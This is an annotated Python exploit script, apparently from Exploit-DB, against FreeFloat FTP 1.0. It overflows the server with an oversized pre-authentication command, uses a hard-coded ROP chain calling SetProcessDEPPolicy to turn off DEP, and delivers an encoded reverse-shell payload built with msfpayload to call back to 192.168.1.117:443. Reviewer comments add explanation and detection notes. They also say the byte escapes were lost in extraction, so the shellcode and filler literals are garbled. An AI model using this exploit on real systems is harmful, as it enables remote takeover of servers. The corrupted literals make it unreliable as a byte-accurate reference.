
# Title : FreeFloat FTP 1.0 - DEP Bypass with ROP
# Published : 2013-04-10
# Author :


#!/usr/bin/python
# Exploit title: FreeFloat ftp 1.0 DEP bypass with ROP 
#
# Exploit Author: negux 
#
# POC: http://www.exploit-db.com/exploits/24479/
# Tested on : Windows XP SP 3 Spanish
import socket,struct

# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.117 LPORT=443 R | msfencode -a x86 -b 'x00x0ax0bx27x36xcexc1x04x14x3ax44xe0x42xa9x0d'

# NOTE(review): the string literals in this listing read as plain text ("x6a",
# "x41", "rn" ...): the backslashes of the \x escapes appear to have been lost
# when the page was extracted, so the values below are not the bytes the
# author sent. Treat the literals as illustrative, not byte-faithful, e.g. when
# deriving detection content from this listing.
#
# Encoded payload emitted by msfencode (see the command line above); this
# script never inspects it, it is only appended to the buffer.
shellcode = (
"x6ax4fx59xd9xeexd9x74x24xf4x5bx81x73x13xb7" +
"x2dxadxa3x83xebxfcxe2xf4x4bxc5x24xa3xb7x2d" +
"xcdx2ax52x1cx7fxc7x3cx7fx9dx28xe5x21x26xf1" +
"xa3xa6xdfx8bxb8x9axe7x85x86xd2x9cx63x1bx11" +
"xccxdfxb5x01x8dx62x78x20xacx64x55xddxffxf4" +
"x3cx7fxbdx28xf5x11xacx73x3cx6dxd5x26x77x59" +
"xe7xa2x67x7dx26xebxafxa6xf5x83xb6xfex4ex9f" +
"xfexa6x99x28xb6xfbx9cx5cx86xedx01x62x78x20" +
"xacx64x8fxcdxd8x57xb4x50x55x98xcax09xd8x41" +
"xefxa6xf5x87xb6xfexcbx28xbbx66x26xfbxabx2c" +
"x7ex28xb3xa6xacx73x3ex69x89x87xecx76xccxfa" +
"xedx7cx52x43xefx72xf7x28xa5xc6x2bxfexdfx1e" +
"x9fxa3xb7x45xdaxd0x85x72xf9xcbxfbx5ax8bxa4" +
"x48xf8x15x33xb6x2dxadx8ax73x79xfdxcbx9exad" +
"xc6xa3x48xf8xfdxf3xe7x7dxedxf3xf7x7dxc5x49" +
"xb8xf2x4dx5cx62xa4x6axcbx77x85xacxd6xdfx2f" +
"xadxa2x0cxa4x4bxc9xa7x7bxfaxcbx2ex88xd9xc2" +
"x48xf8xc5xc0xdax49xadx2ax54x7axfaxf4x86xdb" +
"xc7xb1xeex7bx4fx5exd1xeaxe9x87x8bx2cxacx2e" +
"xf3x09xbdx65xb7x69xf9xf3xe1x7bxfbxe5xe1x63" +
"xfbxf5xe4x7bxc5xdax7bx12x2bx5cx62xa4x4dxed" +
"xe1x6bx52x93xdfx25x2axbexd7xd2x78x18x47x98" +
"x0fxf5xdfx8bx38x1ex2axd2x78x9fxb1x51xa7x23" +
"x4cxcdxd8xa6x0cx6axbexd1xd8x47xadxf0x48xf8" +
"xadxa3")

## ROP chain (SetProcessDEPPolicy technique)
#
# Every gadget address is absolute and hard-coded, so the chain is only valid
# for the exact library builds of the tested target ("Tested on" above); the
# second chain below exists precisely because another language build places
# the same gadgets at different addresses.
#
# Register setup: EBX is loaded with 0xFFFFFFFF and incremented to 0 (the
# value SetProcessDEPPolicy takes to turn DEP off for the calling process),
# EBP receives the address of SetProcessDEPPolicy, and EDI/ESI receive plain
# RET gadgets. PUSHAD then pushes EAX..EDI onto the stack with EDI on top, so
# the final RET walks EDI (RET), ESI (RET) and lands in EBP's target with the
# saved ESP as return address and the pushed EBX (0) in argument position.
#
# Defensive note: the technique depends on (a) modules loaded at fixed
# addresses, i.e. no ASLR, and (b) a process that is not under a permanent
# (AlwaysOn / opted-in) DEP policy, since SetProcessDEPPolicy is refused in
# that case. Both conditions are removed by later Windows versions and by
# enforcing a permanent DEP policy for the service.
rop =  struct.pack("<I",0x77bf362c) # POP EBX / RET
rop += struct.pack("<I",0x41414141) # junk
rop += struct.pack("<I",0x41414141) # junk
rop += struct.pack("<I",0xFFFFFFFF) # EBX = 0xFFFFFFFF; becomes 0 after the INC below
rop += struct.pack("<I",0x7e810b7e) # INC EBX / RET

rop += struct.pack("<I",0x77bebb36) # POP EBP / RET
rop += struct.pack("<I",0x7C862144) # SetProcessDEPPolicy

rop += struct.pack("<I",0x77bf3b47) # POP EDI / RET
rop += struct.pack("<I",0x77be1110) # RET
rop += struct.pack("<I",0x77bf1891) # POP ESI / RET
rop += struct.pack("<I",0x77be2091) # RET

rop += struct.pack("<I",0x7e6ea62b) # PUSHAD / RET

####

### Exploit-DB note: equivalent ROP chain for the Windows SP3 English build.
# Same gadget roles in the same order, different addresses. This chain is not
# referenced anywhere below (the buffer is built from `rop`), so it is only
# documentation for readers on that build.
rop2 =  struct.pack("<I",0x7C9F880B) # POP EBX / RETN 7C9F880B
rop2 += struct.pack("<I",0x41414141) # junk
rop2 += struct.pack("<I",0x41414141) # junk
rop2 += struct.pack("<I",0xFFFFFFFF) # EBX = 0xFFFFFFFF; becomes 0 after the INC below
rop2 += struct.pack("<I",0x77540FB2) # INC EBX / RETN 77540FB2
 
rop2 += struct.pack("<I",0x7C9FD315) # POP EBP / RETN 7C9FD315
rop2 += struct.pack("<I",0x7C862144) # SetProcessDEPPolicy
 
rop2 += struct.pack("<I",0x7C9FCEF2) # POP EDI / RETN 7C9FCEF2
rop2 += struct.pack("<I",0x7C9FCEF3) # RET 7C9FCEF3
rop2 += struct.pack("<I",0x7C9F9CA2) # POP ESI / RETN  7C9F9CA2
rop2 += struct.pack("<I",0x7C9FCEF3) # RETN
 
rop2 += struct.pack("<I",0x7E423AD9) # PUSHAD / RETN 7E423AD9
###


# Target address and port are hard-coded; the lab host is the author's.
target = "192.168.1.71"
port = 21
junk = "x41"*251    # filler up to the saved return address (251 bytes on the tested build)
nops = "x90"*100    # NOP sled between the chain and the payload

# Buffer layout: filler | ROP chain | NOP sled | encoded payload.
# Observable on the wire: this is the very first command sent after the
# banner, i.e. before any USER/PASS, and it is several hundred bytes long with
# a long run of 0x41 followed by a run of 0x90 - a pre-authentication FTP
# command of that size and shape is the detection point for this class of bug.
exploit = junk + rop + nops + shellcode

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
	connect = sock.connect((target,port))  # socket.connect() returns None; this binding is never used
	sock.recv(1024)                         # consume the server banner; the reply is not checked
	sock.send(exploit +"rn")               # single send(); no check that the whole buffer was written
	sock.close()                            # only reached on success; on error the socket is left open
except:
	# Bare except hides the actual failure (and also swallows KeyboardInterrupt);
	# Python 2 print statement - this script does not run under Python 3 as written.
	print "Error to connect... "